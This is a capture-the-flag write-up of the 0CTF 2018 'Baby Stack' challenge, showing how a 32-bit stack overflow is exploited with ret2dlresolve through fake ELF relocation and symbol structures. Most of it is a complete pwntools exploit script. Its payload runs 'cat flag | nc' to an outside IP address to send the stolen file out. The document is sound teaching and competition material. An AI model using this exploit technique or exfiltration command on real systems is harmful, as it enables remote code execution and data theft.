0CTF 2018 Quals: Baby Stack - ret2dlresolve
By David Buchanan, 3rd of April 2018
There were two files provided with the challenge:
babystack
, a 32-bit dynamically
linked Linux ELF binary, stripped of symbols.
pow.py
, a simple python program
which wraps babystack
, requiring a proof-of-work calculation to be performed,
and also ensuring that only 0x100
bytes of input can be sent to the program, in
a single block, and with stdout+stderr piped to /dev/null
.
Download: babystack.tar.gz
The caption for this challenge was "Info leak is no longer required to exploit a stack overflow in 2018."
pwntools checksec
pseudocode of the vulnerable function
The binary has NX, but no stack protections or PIE. Although the vulnerability is a trivial stack overflow, there isn't any immediately useful code we can ROP to, there is no libc provided, and presumably there is ASLR on the host too.
Presumably the proof-of-work requirement was to deter brute-force and timing-based approaches.
With no way to leak a libc address, all of my usual options were exhausted, so
I had to come up with something new (new to me, at least!). There was no entry
in the PLT for system()
, so I thought "why not make one myself?". After rather
a lot of searching (I wasn't really sure what to search for), I came across an
excellent Phrack article. The whole article
is definitely worth reading, but the relevant part here is section 5.
In summary, the technique is to put some fake datastructures onto the heap such
that ld.so
will do all the work for us, and resolve and call the system()
symbol. All we need is an Elf32_Rel
and an Elf32_Sym
.
And now for my implementation:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 | #!/usr/bin/env python2 from pwn import * elf = ELF("babystack") # an arbitrary rw location we can use to store our stage2 payload STAGE2_ADDR = 0x0804ac00 GADGET_LEAVE = 0x080483a8 # leave; ret; PLT = elf.get_section_by_name(".plt")["sh_addr"] STRTAB, SYMTAB, JMPREL = map(elf.dynamic_value_by_tag, ["DT_STRTAB", "DT_SYMTAB", "DT_JMPREL"]) log.info("PLT: " + hex(PLT)) log.info("STRTAB: " + hex(STRTAB)) log.info("SYMTAB: " + hex(SYMTAB)) log.info("JMPREL: " + hex(JMPREL)) stage1 = "A"*40 stage1 += p32(STAGE2_ADDR-4) # saved ebp # ROP ENTRYPOINT: stage1 += p32(elf.plt["read"]) # read(stdin, stage2, 0x100-0x40) stage1 += p32(GADGET_LEAVE) # jump into stage2 ROP stage1 += p32(0) # stdin stage1 += p32(STAGE2_ADDR) stage1 += p32(0x100-0x40) # length # hand-written ROP because we're tight on space. # no padding needed! assert(len(stage1) == 0x40) # placeholder for ROP, will be inserted later once we know some offsets stage2 = p32(0)*4 # start with some strings we'll need to reference later stage2_cmd_str = len(stage2) stage2 += "cat flag | nc 185.122.59.166 1234\0" # ^^^ It'd be more sensible to put this on the end of the payload, but I kinda # wanted to show off how flexible my payload generation is - you can change the # cmd length without anything breaking stage2_system_str = len(stage2) stage2 += "system\0" # 16 byte align, relative to SYMTAB stage2 += "A"*((SYMTAB-len(stage2))%16) assert((len(stage2)+STAGE2_ADDR-SYMTAB)%16 == 0) # sanity check, alignment is hard # Fake Elf32_Sym stage2_fake_sym = len(stage2) stage2 += p32(STAGE2_ADDR+stage2_system_str-STRTAB) # index of "system" in strtab stage2 += p32(0x33333333) # st_value (unused) stage2 += p32(0x44444444) # st_size (unused) stage2 += p32(0) # st_other & 3 must be 0 # Fake Elf32_Rel stage2_fake_rel = len(stage2) stage2 += p32(STAGE2_ADDR+0x100) # arbitrary writable address r_info = ((stage2_fake_sym+STAGE2_ADDR-SYMTAB)//16) r_info = (r_info << 8) | 7 stage2 += p32(r_info) # offset of fake sym, reloc type 7=R_386_JMP_SLOT # stage2 ROP payload stage2_rop = "" stage2_rop += p32(PLT) # plt start stage2_rop += p32(STAGE2_ADDR+stage2_fake_rel-JMPREL) # reloc_offset stage2_rop += p32(0xdeadbeef) # only reached after system() stage2_rop += p32(STAGE2_ADDR+stage2_cmd_str) # argument to system() # Actually insert the ROP into the payload stage2 = stage2_rop + stage2[len(stage2_rop):] payload = stage1 + stage2 log.info(hex(len(payload)) + "/0x100 bytes used.") payload += "A"*(0x100-len(payload)) # pad to 0x100 bytes TESTING = False if TESTING: babystack = process("./babystack") else: babystack = remote("202.120.7.202", 6666) #babystack = process(["python2", "pow.py"]) chal = babystack.recvline().strip() log.info("Calculating PoW for " + chal) sol = 0 while not sha256sum(chal+p32(sol)).startswith("\0\0\0"): sol += 1 babystack.send(p32(sol)) babystack.send(payload) babystack.interactive() |
The first stage of the payload is the 0x40 bytes read by the vulnerable call to
read()
. It does some basic ROP to read the secondary payload into a known
location on the heap,
and then pivots the stack over to the stage2 payload using a leave
gadget.
The stage2 ROP calls the function at the beginning of the .plt
section. The argument
to this function is an index into the relocation table, which is large enough that
it ends up pointing to our crafted Elf32_Rel
on the heap, as described in the
Phrack article.
I completely ignored the part about VERSYM
, so either I got lucky or symbol
versioning was disabled (I think I got lucky, because most of the nearby heap was
zeroes, i.e. a valid version index).
Here's a diagram that hopefully makes it easier to understand what's going on:
crazy arrows everywhere
The +SYMTAB
label on one of the arrows is a bit of an oversimplification,
I was short on space.
r_info
is first bitshifted 8 bits to the right, before being used as an index
into the SYMTAB
table (Again, as described in the Phrack article).
Since I still had no way to receive output from the program, I used netcat to send
the flag over to my listening server: cat flag | nc 185.122.59.166 1234
. The
flag was: flag{return_to_dlresolve_for_warming_up}
.
Random digression:
While writing this exploit, I realised it could be quite useful to use some kind of constraint solver for payload generation. Imagine if all I needed to do was describe the datastructures needed, and what needed to point to what (and maybe even specify "no \n allowed"), and my entire payload could be generated fully automatically. This would be particularly useful for generating ROP payloads which need to be adjusted due to ASLR - some gadgets may become off-limits if they have a null or \n in their address for example. It would also be useful to add an element of randomness, for generating a unique payload each time.
Maybe such a thing already exists? Either way, it could make an interesting dissertation subject...